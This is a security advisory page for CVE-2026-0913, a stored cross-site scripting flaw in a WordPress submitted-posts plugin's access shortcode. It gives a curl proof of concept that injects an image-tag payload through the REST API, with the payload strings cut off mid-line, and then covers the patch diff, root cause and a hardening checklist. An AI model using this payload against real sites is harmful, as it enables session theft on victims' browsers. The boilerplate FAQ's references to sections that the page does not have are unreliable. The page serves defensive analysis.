back to articles
view analysis
SECURITY ADVISORY / 01

CVE-2026-0913 Exploit & Vulnerability Analysis

Complete CVE-2026-0913 security advisory with proof of concept (PoC), exploit details, and patch analysis.

cve_patchdiff:user-submitted-posts NVD ↗
Exploit PoC Vulnerability Patch Analysis

The Exploit

An authenticated attacker with Contributor-level access can inject a stored XSS payload into the usp_access shortcode deny/content attributes.

curl -i -X POST 'https://TARGET/wp-json/wp/v2/posts' \
  -H 'Authorization: Basic BASE64_CONTRIBUTOR_CREDS' \
  -H 'Content-Type: application/json' \
  -d '{
    "title": "usp_access XSS",
    "content": "[usp_access deny=\"<img src=x
    "status": "publish"
  }'

curl -i 'https://TARGET/?p=123' | grep -o '<img src=x

The first request stores the malicious usp_access shortcode in post content. The second request loads the published page and the response contains the injected <img> tag, meaning any victim viewing that page would execute the injected script.

What the Patch Did

Before:

$deny = preg_replace('#<script(.*)>(.*)</script>#is', '', $deny);
$content = preg_replace('#<script(.*)>(.*)</script>#is', '', $content);

After:

$deny = wp_kses_post($deny);
$content = wp_kses_post($content);

The patch replaced an ad-hoc regex-based filter with wp_kses_post(), a WordPress sanitization API that whitelists allowed HTML tags and strips unsafe markup and attributes.

Root Cause

This was CWE-79: Stored Cross-Site Scripting. User-controlled shortcode attributes deny and content were accepted by usp_access and only had <script> tags stripped by a regex. That sanitization was insufficient, so attacker-supplied HTML and event handlers flowed from the shortcode attribute into page output unchecked.

Why It Works

The load-bearing fix is wp_kses_post(). Without it, the plugin still allows HTML like <img src=x> or other non-<script> payloads through because the regex only targets literal <script> tags. The earlier code did not validate the actual shortcode content as HTML, so any attribute-based or tag-based XSS vector bypassed the filter. The other changes around htmlspecialchars() and brace replacement are defensive hardening for related rendering paths, but the critical security control is the HTML whitelist sanitization provided by wp_kses_post().

Hardening Checklist

  • Use wp_kses_post() or wp_kses() for any user-supplied HTML that will be rendered in post content or shortcode output.
  • For shortcode attributes that should not contain HTML, use sanitize_text_field() and esc_attr() instead of attempting regex stripping.
  • Never rely on regex to remove <script> tags; use WordPress sanitization APIs.
  • Validate shortcode input with shortcode_atts() and explicit sanitizers for each expected field.
  • Escape shortcode output at render time with esc_html() or esc_attr() whenever marking user input as text rather than markup.

References

  • https://nvd.nist.gov/vuln/detail/CVE-2026-0913

Frequently asked questions about CVE-2026-0913

What is CVE-2026-0913?

CVE-2026-0913 is a security vulnerability. This security advisory provides detailed technical analysis of the vulnerability, exploit methodology, affected versions, and complete remediation guidance.

Is there a PoC (proof of concept) for CVE-2026-0913?

Yes. This writeup includes proof-of-concept details and a technical exploit breakdown for CVE-2026-0913. Review the analysis sections above for the PoC walkthrough and code examples.

How does CVE-2026-0913 get exploited?

The technical analysis section explains the vulnerability mechanics, attack vectors, and exploitation methodology. PatchLeaks publishes this information for defensive and educational purposes.

What products and versions are affected by CVE-2026-0913?

CVE-2026-0913 — check the affected-versions section of this advisory for specific version ranges, vulnerable configurations, and compatibility information.

How do I fix or patch CVE-2026-0913?

The patch analysis section provides guidance on updating to patched versions, applying workarounds, and implementing compensating controls.

What is the CVSS score for CVE-2026-0913?

The severity rating and CVSS scoring for CVE-2026-0913 is documented in the vulnerability details section. Refer to the NVD entry for the current authoritative score.